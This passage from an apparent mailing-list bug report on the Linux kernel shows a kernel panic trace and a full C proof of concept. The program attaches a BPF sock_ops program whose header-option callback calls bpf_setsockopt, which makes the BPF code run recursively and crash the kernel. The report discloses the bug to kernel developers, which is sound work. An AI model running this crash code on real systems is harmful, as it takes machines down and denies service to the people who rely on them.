[ 138.177704][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.177716][ C0] ? prep_compound_page+0x26a/0x520
[ 138.177729][ C0] ? get_page_from_freelist+0x1f46/0x2ae0
[ 138.177744][ C0] tcp_established_options+0x7c4/0xae0
[ 138.177757][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.177770][ C0] ? __skb_clone+0x59c/0x790
[ 138.177782][ C0] __tcp_transmit_skb+0x2c1/0x4cd0
[ 138.177798][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177810][ C0] ? __pfx___tcp_transmit_skb+0x10/0x10
[ 138.177823][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177838][ C0] ? kvm_clock_get_cycles+0x3f/0x70
[ 138.177856][ C0] tcp_write_xmit+0x187e/0x7dc0
[ 138.177877][ C0] ? _copy_from_iter+0x14b/0x1710
[ 138.177890][ C0] __tcp_push_pending_frames+0xb5/0x3c0
[ 138.177906][ C0] tcp_push+0x22e/0x700
[ 138.177918][ C0] tcp_sendmsg_locked+0x2c05/0x3dd0
[ 138.177935][ C0] ? __pfx_tcp_sendmsg_locked+0x10/0x10
[ 138.177947][ C0] ? do_raw_spin_lock+0x130/0x270
[ 138.177961][ C0] ? __pfx_do_raw_spin_lock+0x10/0x10
[ 138.177975][ C0] ? __pfx_inet_sendmsg+0x10/0x10
[ 138.177987][ C0] ? __local_bh_enable_ip+0xa9/0x130
[ 138.178002][ C0] ? __pfx_tcp_sendmsg+0x10/0x10
[ 138.178019][ C0] ? __pfx_inet_sendmsg+0x10/0x10
[ 138.178031][ C0] tcp_sendmsg+0x34/0x50
[ 138.178042][ C0] inet_sendmsg+0xbe/0x150
[ 138.178054][ C0] __sys_sendto+0x46b/0x500
[ 138.178065][ C0] ? __pfx___sys_sendto+0x10/0x10
[ 138.178075][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.178093][ C0] ? fput+0x9f/0xe0
[ 138.178106][ C0] ? __sys_connect+0x10a/0x1a0
[ 138.178115][ C0] ? __pfx___sys_connect+0x10/0x10
[ 138.178124][ C0] ? fd_install+0x240/0x550
[ 138.178138][ C0] ? xfd_validate_state+0x66/0x190
[ 138.178155][ C0] __x64_sys_sendto+0xe5/0x1c0
[ 138.178165][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.178181][ C0] do_syscall_64+0x11b/0xf80
[ 138.178198][ C0] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 138.178209][ C0] RIP: 0033:0x7f1ea5c6db54
[ 138.178217][ C0] Code: 89 4c 24 1c e8 ed ac f7 ff 44 8b 54 24 1c
8b 3c 24 45 31 c9 89 c5 48 8b 54
[ 138.178226][ C0] RSP: 002b:00007ffefa0c04c0 EFLAGS: 00000246
ORIG_RAX: 000000000000002c
[ 138.178235][ C0] RAX: ffffffffffffffda RBX: 00007ffefa0c07a8 RCX:
00007f1ea5c6db54
[ 138.178242][ C0] RDX: 0000000000000001 RSI: 000055ccacb80095 RDI:
0000000000000007
[ 138.178247][ C0] RBP: 0000000000000000 R08: 0000000000000000 R09:
0000000000000000
[ 138.178253][ C0] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000000000
[ 138.178259][ C0] R13: 00007ffefa0c07b8 R14: 000055ccacb81dd8 R15:
00007f1ea5d84020
[ 138.178270][ C0] </TASK>
[ 138.178273][ C0] Modules linked in:
[ 138.178280][ C0] ---[ end trace 0000000000000000 ]---
[ 138.178285][ C0] RIP: 0010:mark_lock+0x1d/0xae0
[ 138.178295][ C0] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 55
48 89 e5 41 57 41 56 41 55 41 55
[ 138.178304][ C0] RSP: 0018:ffa000000ceaff90 EFLAGS: 00010086
[ 138.178311][ C0] RAX: 72760a0d8792c400 RBX: ff1100002fa255d8 RCX:
ffffffff96d71118
[ 138.178318][ C0] RDX: 0000000000000008 RSI: ff1100002fa258a8 RDI:
ff1100002fa24a80
[ 138.178324][ C0] RBP: ffa000000ceb0028 R08: 0000000000000000 R09:
0000000000000000
[ 138.178329][ C0] R10: 0000000000000000 R11: 0000000000000007 R12:
ff1100002fa258a8
[ 138.178335][ C0] R13: 0000000000000000 R14: 0000000000000012 R15:
0000000000000003
[ 138.178341][ C0] FS: 00007f1ea5b60740(0000)
GS:ff110000cd71d000(0000) knlGS:0000000000000000
[ 138.178351][ C0] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 138.178358][ C0] CR2: ffa000000ceaff88 CR3: 0000000027657000 CR4:
0000000000753ef0
[ 138.178364][ C0] PKRU: 55555554
[ 138.178368][ C0] Kernel panic - not syncing: Fatal exception in
interrupt
[ 138.178419][ C0] Kernel Offset: disabled
```

## Proof of Concept

The following C program demonstrates the vulnerability on the latest
bpf-next (commit 6f6c794d0ff05dab1fa4677f39043de8a6a80da3)

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <linux/bpf.h>
#include <pthread.h>

#define SOL_TCP 6
#define TCP_NODELAY 1
#define BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG (1<<6)
#define BPF_SOCK_OPS_HDR_OPT_LEN_CB 14
#define BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB 4
#define BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB 5

#define BPF_REG_1 1
#define BPF_REG_2 2
#define BPF_REG_3 3
#define BPF_REG_4 4
#define BPF_REG_5 5
#define BPF_REG_6 6
#define BPF_REG_8 8
#define BPF_REG_10 10

struct bpf_insn {
__u8 code;
__u8 dst_reg:4;
__u8 src_reg:4;
__s16 off;
__s32 imm;
};

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { .code = BPF_JMP | BPF_OP(OP) | BPF_K,
.dst_reg = DST, .src_reg = 0, .off = OFF, .imm = IMM })
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { .code = BPF_LDX | BPF_SIZE(SIZE) |
BPF_MEM, .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { .code = BPF_ALU64 | BPF_MOV | BPF_X,
.dst_reg = DST, .src_reg = SRC, .off = 0, .imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { .code = BPF_ALU64 | BPF_MOV | BPF_K,
.dst_reg = DST, .src_reg = 0, .off = 0, .imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { .code = BPF_STX | BPF_SIZE(SIZE) |
BPF_MEM, .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { .code = BPF_ALU64 | BPF_OP(OP) | BPF_K,
.dst_reg = DST, .src_reg = 0, .off = 0, .imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { .code = BPF_JMP | BPF_CALL, .dst_reg = 0,
.src_reg = 0, .off = 0, .imm = FUNC })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { .code = BPF_JMP | BPF_EXIT, .dst_reg = 0,
.src_reg = 0, .off = 0, .imm = 0 })

int bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
int insn_cnt, const char *license) {
union bpf_attr attr = {
.prog_type = type,
.insns = (uint64_t)insns,
.insn_cnt = insn_cnt,
.license = (uint64_t)license,
.log_level = 1,
.log_size = 65536,
.log_buf = (uint64_t)malloc(65536),
};
int ret = syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
if (ret < 0) {
printf("bpf_prog_load failed: %m\n%s\n", (char *)attr.log_buf);
}
return ret;
}

void* server_thread(void* arg) {
int s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port =
htons(12345), .sin_addr.s_addr = htonl(INADDR_ANY) };
bind(s, (struct sockaddr *)&addr, sizeof(addr));
listen(s, 1);

int c = accept(s, NULL, NULL);
char buf[64];
while(recv(c, buf, sizeof(buf), 0) > 0) {}
return NULL;
}

int main() {
struct bpf_insn prog[] = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1), // save ctx
BPF_LDX_MEM(BPF_W, BPF_REG_2, BPF_REG_6, 0), // r2 = ctx->op

// if op == BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB (4) -> set flag
BPF_JMP_IMM(BPF_JEQ, BPF_REG_2,
BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB, 4), // jumps to 7
// if op == BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB (5) -> set flag
BPF_JMP_IMM(BPF_JEQ, BPF_REG_2,
BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB, 3), // jumps to 7
// if op == BPF_SOCK_OPS_HDR_OPT_LEN_CB (14) -> trigger setsockopt
BPF_JMP_IMM(BPF_JEQ, BPF_REG_2, BPF_SOCK_OPS_HDR_OPT_LEN_CB,
7), // jumps to 12

BPF_MOV64_IMM(BPF_REG_0, 0), // 5
BPF_EXIT_INSN(), // 6

// --- Establish CB: Enable Option Write Flag
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), // 7
BPF_MOV64_IMM(BPF_REG_2, BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG),
BPF_EMIT_CALL(59), // bpf_sock_ops_cb_flags_set
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),

// --- HDR_OPT_LEN_CB: trigger Setsockopt TCP_NODELAY to recurse
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), // 12
BPF_MOV64_IMM(BPF_REG_2, SOL_TCP),
BPF_MOV64_IMM(BPF_REG_3, TCP_NODELAY),
BPF_MOV64_IMM(BPF_REG_8, 1),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_8, -4), // val = 1
BPF_MOV64_REG(BPF_REG_4, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, -4), // &val
BPF_MOV64_IMM(BPF_REG_5, 4), // sizeof(val)
BPF_EMIT_CALL(49), // bpf_setsockopt
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};

int prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCK_OPS, prog,
sizeof(prog)/sizeof(prog[0]), "GPL");
if (prog_fd < 0) return 1;

system("mkdir -p /sys/fs/cgroup/bpf_oops");
int cg_fd = open("/sys/fs/cgroup/bpf_oops", O_RDONLY);
if (cg_fd < 0) return 1;

union bpf_attr attr = {
.target_fd = cg_fd,
.attach_bpf_fd = prog_fd,
.attach_type = BPF_CGROUP_SOCK_OPS,
};
syscall(__NR_bpf, BPF_PROG_ATTACH, &attr, sizeof(attr));

char pid[32];
sprintf(pid, "%d", getpid());
int procs = open("/sys/fs/cgroup/bpf_oops/cgroup.procs", O_WRONLY);
write(procs, pid, strlen(pid));
close(procs);

pthread_t thread;
pthread_create(&thread, NULL, server_thread, NULL);
sleep(1);

int s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port =
htons(12345), .sin_addr.s_addr = htonl(INADDR_LOOPBACK) };
connect(s, (struct sockaddr *)&addr, sizeof(addr));

// Trigger pushing pending frames and BPF recursive execution
send(s, "A", 1, 0);

sleep(2);
return 0;
}
```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.
config-next
Reply all
Reply to author
Forward
0 new messages